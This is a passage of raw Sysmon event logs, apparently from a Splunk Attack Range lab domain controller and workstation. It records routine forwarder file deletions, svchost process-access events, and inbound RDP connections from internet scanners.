Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=654697CA3011A0C33F9DF48CB0F47CA1,SHA256=E88F07810B54D0A2B5A7E7CE90720B1649959EC036F9826BD31BF9F210FDA6A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082382Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:36.073{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=194D6E9132C9CA95175572FCC9CC10EF,SHA256=FD54853B07292BED5E737C3233CF505FF76F89F4C721CC623A5017817EE1689C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051060Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:36.500{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63C53C978B5298C40DB1D20BE9D86516,SHA256=D83D3FFAA7FA736687AC674B8428E40C760FD1BFCEBDE188BE9546B6B55B57B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082388Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:37.651{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A10825EF6AD75D094228F5248BC0BDC7,SHA256=79EDE74D56CDAAC22E2EDE4CCD950DC6F6D6847B84C6B94C30ACE7C424EDCD60,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082387Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:37.511{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=57FBFCB4B4BF9F7F51FC6F546668CAA0,SHA256=060F00CF89A4DD6A454615387FA602FF0B9B5586F7F85BD89B907BAAEC506FB8,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000051062Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:34.459{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com59553-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000051061Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:37.501{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F74C4273FAECC81087BE82331F63A4B8,SHA256=D722CA550C7FE384ED0EE9746D29707ECDB0081628D45CE7BBAD7B85E9E26F16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082392Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:38.932{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C0B950C9DC9E8F8D939B2DC5365D9F21,SHA256=1E0010061ED0C4768DB34258251EA39EEEE7F8104280ECB0CAECB279F2767E90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082391Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:38.667{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D74DEEAB2F69B51941CC753BBF017A5,SHA256=FC014E47BD4687FF2DBCB659E409DD46553E96A9A4C603CB6C8641C8207ACDD5,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082390Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:37.315{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com54816-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082389Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:36.923{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-23012-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000051065Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:35.501{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-54410-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000051064Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:38.516{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B82340ACA72AF37BBBD65C2AF6E8ACF,SHA256=DEB5E0BD57E2AB2DF3B2F3C41CD53F8B7FA54D21A6E880C23C2ACFEE19BDFDDF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051063Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:38.094{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B523959C293339E4AB149C6ED9A27E2C,SHA256=49FB7E3E130FEBE6BCFCF241D3739933566F37AF8D5BD40D0AB78515791ABA73,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082393Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:39.682{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C0015F1C43C525A4691BB81EF828E93,SHA256=638038DCBFD6E23FA44B3B7E95E28A902CD8CBA8771AB37D4378C1D038B7E053,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000051071Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:37.187{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com55443-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000051070Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:37.130{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-55881-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000051069Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:37.059{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-52944-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000051068Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:36.793{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52565-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000051067Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:39.532{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD1599EF3FC50D6C513FD5F079210325,SHA256=69B8317BC6297C8C2EA3F57041CDEE8F73E6A1744BFD325ABFC1D0828DFBB9CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051066Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:39.266{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3430628B25FE4E68B1F44C58E4CD6AFC,SHA256=E7E1C7E128861CCA25E52FB074E9477D641A48DFA025C698602AB13EB720B006,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082398Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:40.979{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1500-00000000BB01}1496C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082397Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:40.979{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1500-00000000BB01}1496C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082396Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:40.979{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1500-00000000BB01}1496C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000082395Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:40.823{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C251DB76DBBD3ED4E9758F78C8DE2DEB,SHA256=2E53394FF239611A4953E0C35CFC28BB600A56301779BB9344B0ACB81F17915C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082394Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:40.698{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=437BA5A3E955334877DCD2EA7DCCF715,SHA256=345E67EDF6882F48BF704CF53BC3DB37949200B40EFC6817B237FCA275041BC7,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000051074Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:38.813{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-57353-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000051073Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:40.547{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC8DDD19B3E24810DC8048B03220836E,SHA256=C31958E4A6E124DCA2F511AF4B149FCFE55628B53C8C5EDE3CCBA758412E31FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051072Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:40.376{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=64AA8CBFC19269E727989A2C7A655CDF,SHA256=EAD1DEEF0BEEF88E034E0FFFE21C7E7F7FE7F9EF2C650F93C6225345FFE2BC1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082402Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:41.745{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F75510379CC44BBA794B988D92BBBDA,SHA256=A61C4C8A7C5AD6E8D3384F7BC017639482061EAE4E3D49A5823BDF62F2289A42,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082401Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:39.803{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com49585-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082400Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:39.746{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-28434-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082399Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:39.744{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-25724-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000051076Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:41.563{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49BB0D7FCF1A8486D059B5FDAA446A78,SHA256=0605D7371C4939C082806C729FFDF047EE79442CBEEC084DC03DE59F35ABC839,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051075Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:41.422{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0FA280ABE8A2D7EC916843BECAA74145,SHA256=8802D80730C4B124B56D3144BE1259E06FA29939213C3B85CB137423E6864B8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082406Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:42.823{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB294B43EC86B014A482B3FD24FCB936,SHA256=59574A093189844F892AB202001BAA5AA8AD0F7C1760138F3A3468644E84C598,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082405Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:41.293{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57672-false10.0.1.12-8000- 354300x800000000000000082404Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:41.275{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-27079-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082403Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:41.239{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-29789-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000051077Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:42.579{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD57D53484D480CBFF0F7754F49097F8,SHA256=6790B78F8B74DE0DFB5C270634AE6BDB0FDD3DE7064F8A7FDC9084DA9EF601DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082408Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:43.838{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22CC73E4C4547A7E77496C6CC24DA1FC,SHA256=E6D8315D07D96E58F97BC48DE54F4DAC25B5E8D239F73C80B63BFB497EEBC613,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082407Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:43.010{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=31CE0F28EF2885268BE9B8609262A002,SHA256=E89547BAAB05EB12D59CC3418C47701E634A5F5469490A9C854C383C81D0A030,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000051081Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:41.966{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-60290-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000051080Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:41.809{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52566-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000051079Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:43.580{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7662641C6388B37771377530492BDDA0,SHA256=AFB145107711FCA6D9663825F977FEF0FD1E5D029A3B84289EB13C6E66F414BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051078Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:43.049{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=64E79FF70326F2278542CA77FBB5379B,SHA256=9B5665EAAF9415D60932702FDAC9D879D54C0AB1E908EC735BFDA2564F1E4BA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082411Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:44.917{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AAF416797722E586DC32E679E5F26BF3,SHA256=E2695631AC5C578FBDEBBED99E56C3B9EA1AB17D0EC4D940F8E5565032C481F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082410Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:44.870{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4BD9808320ADC15BC460CD47C172457,SHA256=787939BCAF967B08305DBFD86E868257545CF13608726FAA940CEDE3E17D9D2E,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082409Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:43.481{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com49338-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000051085Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:43.003{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com55713-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000051084Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:42.596{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com65501-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000051083Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:44.581{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3CDD9EF921B68A6E9B708208B7724DD,SHA256=8F68E0D781F4D20FC90A9F85F07C42AF81D886271DDF9B397E2656604E0A2B97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051082Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:44.300{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C03DB71732A6CE73A7615C9949A8C884,SHA256=BE7735CAE56320D01AAFFB4FECC308EA3C048A0D60613029A18EDD7C7EA8304F,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082413Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:44.157{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-32499-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082412Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:43.868{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com56652-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000051088Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:43.395{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-58819-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000051087Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:45.660{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 